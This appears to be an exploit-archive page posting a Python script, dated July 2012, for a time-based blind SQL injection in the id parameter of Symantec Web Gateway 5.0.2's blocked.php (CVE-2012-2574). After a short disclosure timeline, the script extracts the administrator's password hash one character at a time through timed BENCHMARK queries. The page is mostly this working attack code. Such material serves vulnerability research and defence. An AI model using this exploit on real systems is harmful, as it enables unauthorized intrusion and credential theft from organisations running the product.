Symantec Web Gateway 5.0.2 Blind SQL Injection

Symantec Web Gateway 5.0.2 Blind SQL Injection: Posted Jul 23, 2012; Authored by muts; Symantec Web Gateway version 5.0.2 suffers from a remote blind SQL injection vulnerability.; tags | exploit, remote, web, sql injection; advisories | CVE-2012-2574; SHA-256 | 6aec98e00f8daa7f3e784b9b085136fd783f41fed252a1521762a3217af9e407; Download | Favorite | View

Symantec Web Gateway 5.0.2 Blind SQL Injection

#!/usr/bin/python
 
######################################################################################
# Exploit Title: Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection
# Date: Jul 23 2012
# Author: muts
# Version: Symantec Web Gateway 5.0.2
# Vendor URL: http://www.symantec.com
#
# Timeline:
#
# 29 May 2012: Vulnerability reported to CERT
# 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
#
######################################################################################
 
import urllib
import time
import sys
from time import sleep
 
# Set your timing variable. A minimum value of 200 (2 seconds) was tested on localhost.
# This might need to be higher on production systems.
 
timing=300
 
def check_char(i,j,timing):
 
    url =   ("https://172.16.254.111/spywall/blocked.php?d=3&file=3&id=1)" +
        " or 1=(select IF(conv(mid((select password from users),%s,1),16,10) "+
        "= %s,BENCHMARK(%s,rand()),11) LIMIT 1&history=-2&u=3") % (j,i,timing)
    start=time.time()
    urllib.urlopen(url)
    end =time.time()
    howlong=int(end-start)
    return howlong
 
counter=0
startexploit=time.time()
print "[*] Symantec \"Wall of Spies\" hash extractor"
print "[*] Time Based SQL injection, please wait..."
sys.stdout.write("[*] Admin hash is : ")
sys.stdout.flush()
 
for m in range(1,33):
    for n in range(0,16):
        counter= counter+1
        output = check_char(n,m,timing)
        if output > ((timing/100)-1):
            byte =hex(n)[2:]
            sys.stdout.write(byte)
            sys.stdout.flush()
            break
endexploit=time.time()
totalrun=str(endexploit-startexploit)
print "\n[*] Total of %s queries in %s seconds" % (counter,totalrun)

Top Authors In Last 30 Days

Red Hat 219 files
indoushka 83 files
Ubuntu 79 files
Gentoo 36 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,707)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,485)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,737)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

Symantec Web Gateway 5.0.2 Blind SQL Injection

Symantec Web Gateway 5.0.2 Blind SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Symantec Web Gateway 5.0.2 Blind SQL Injection

Share This

Symantec Web Gateway 5.0.2 Blind SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems